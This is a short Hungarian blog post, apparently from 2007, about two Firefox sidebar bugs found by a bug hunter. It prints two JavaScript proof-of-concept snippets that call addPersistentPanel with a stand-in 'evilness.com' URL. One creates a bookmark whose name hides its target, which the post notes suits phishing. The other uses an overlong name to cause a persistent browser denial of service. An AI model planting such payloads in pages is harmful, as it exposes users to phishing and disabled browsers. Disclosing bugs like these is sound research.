Ronald ma reggel vadászni indult. Firefox hibákra vadászni. Nem régen leste ki a gazfickók egyik rejtekhelyét: az oldalsávot, a helyet, amiről a legtöbb ember azt sem tudja, hogy létezik! A vadász szimata jó volt, nem tért haza üres kézzel:
Az első hiba/feature segítségével arra vehetjük rá a gyanútlan felhasználókat, hogy olyan könyvjelzőket hozzanak létre, melyek neve nem tükrözi az URL-t amit takarnak:
Az első hiba/feature segítségével arra vehetjük rá a gyanútlan felhasználókat, hogy olyan könyvjelzőket hozzanak létre, melyek neve nem tükrözi az URL-t amit takarnak:
<script>
window.sidebar.addPersistentPanel('BuheraBlog',
'http://www.evilness.com/h4x0r.do','\0');
</script>
Még szerencse, hogy hősünk hobbija a bugvadászat, és nem az adathalászat...
A második hiba egy jól megtermett perzisztens DoS, lényegében az előző továbbfejlesztése. A következő kódrészlet által beállított könyvjelzőre kattintva, a böngésző nem hajlandó többé megjeleníteni bármilyen URL-t. Akkor sem ha újraindítjuk! El kell valahogy tüntetni az oldalsáv paneljét, vagy újrainstallálni a böngészőt. Az alábbi kód nem biztos hogy megfelelő számú A-t tartalmaz, de Ronald új találmánya, a BrowserFry elég hamar megolja ezt a problémát (is).
Update: Ez utóbbi hiba kihasználását megleshetitek itt(.avi), ha nem akarjátok a saját böngészőtöket kockáztatni.
<script>
window.sidebar.addPersistentPanel('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRGGHH!
...és még több AA!:)',
'http://www.evilness.com/h4x0r.do','\0');
</script>
Update: Ez utóbbi hiba kihasználását megleshetitek itt(.avi), ha nem akarjátok a saját böngészőtöket kockáztatni.
mahamunyi 2007.10.30. 18:05:56